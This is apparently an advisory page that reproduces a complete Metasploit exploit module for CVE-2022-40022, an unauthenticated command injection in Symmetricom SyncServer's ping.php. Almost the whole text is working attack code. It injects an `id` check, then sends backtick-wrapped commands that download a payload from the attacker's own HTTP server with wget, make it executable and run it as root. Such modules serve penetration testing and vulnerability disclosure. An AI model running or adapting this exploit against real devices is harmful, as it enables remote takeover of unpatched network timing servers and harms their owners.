This Metasploit module exploits an unauthenticated command injection vulnerability in /controller/ping.php in Symmetricom SyncServer. The S100 through S350 (End of Life) models should be vulnerable to unauthenticated exploitation due to a session handling vulnerability.
advisories | CVE-2022-40022
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit
Rank = ExcellentRanking
include Msf::Exploit::EXE
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Symmetricom SyncServer Unauthenticated Remote Command Execution',
'Description' => %q{
This module exploits an unauthenticated command injection vulnerability in /controller/ping.php.
The S100 through S350 (End of Life) models should be vulnerable to
unauthenticated exploitation due to a session handling vulnerability.
Later models require authentication which is not provided in this module because we can't test it.
The command injection vulnerability is patched in the S650 v2.2 (CVE-2022-40022).
Run 'check' first to determine if vulnerable.
The server limits outbound ports. Ports 25 and 80 TCP were successfully used for SRVPORT
and LPORT while testing this module.
},
'Author' => [
'Steve Campbell', # @lpha3ch0 - Exploit PoC, Metasploit module
'Justin Fatuch Apt4hax', # Exploit PoC
'Robert Bronstein' # Metasploit Module
],
'References' => [
['CVE', '2022-40022'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-40022']
],
'DisclosureDate' => '2022-08-31',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Targets' => [
[ 'Automatic', {} ],
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'Reliability' => [ REPEATABLE_SESSION ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]
}
)
)
register_options(
[
OptString.new('FILENAME', [true, 'Payload filename', 'payload.elf']),
OptAddress.new('SRVHOST', [true, 'HTTP Server Bind Address', '127.0.1.1']),
OptInt.new('SRVPORT', [true, 'HTTP Server Port', '4444'])
], self.class
)
end
def primer; end
def on_request_uri(cli, req)
@pl = generate_payload_exe
print_status("#{peer} - Payload request received: #{req.uri}")
send_response(cli, @pl)
end
def check
uri = '/controller/ping.php'
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' =>
{
'currentTab' => 'ping',
'refreshMode' => 'dirty',
'ethDirty' => 'false',
'snmpCfgDirty' => 'false',
'snmpTrapDirty' => 'false',
'pingDirty' => 'true',
'hostname' => "`id`",
'port' => 'eth0',
'pingType' => 'ping'
}
})
if res && res.body.to_s =~ /uid=0/
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def request(cmd)
uri = '/controller/ping.php'
send_request_cgi({
'method' => 'POST',
'Content-Type' => 'application/x-www-form-encoded',
'uri' => uri,
'vars_post' =>
{
'currentTab' => 'ping',
'refreshMode' => 'dirty',
'ethDirty' => 'false',
'snmpCfgDirty' => 'false',
'snmpTrapDirty' => 'false',
'pingDirty' => 'true',
'hostname' => cmd,
'port' => 'eth0',
'pingType' => 'ping'
}
})
end
def exploit
srvhost = datastore['SRVHOST']
srvport = datastore['SRVPORT']
filename = datastore['FILENAME']
resource_uri = '/' + filename
shell_path = '/tmp/'
cmds = [
"`wget${IFS}http://" + srvhost + ':' + srvport + '/' + filename + '${IFS}-O${IFS}' + shell_path + filename + "`",
"`chmod${IFS}700${IFS}" + shell_path + filename + "`",
"`" + shell_path + filename + "`"
]
start_service({
'Uri' => {
'Proc' => proc { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}
})
print_status("#{rhost}:#{rport} - Exploit started...")
print_status("#{rhost}:#{rport} - Sending wget command...")
request(cmds[0])
sleep(3)
print_status("#{rhost}:#{rport} - Making payload executable...")
request(cmds[1])
sleep(3)
print_status("#{rhost}:#{rport} - Executing payload...")
request(cmds[2])
sleep(3)
end
end
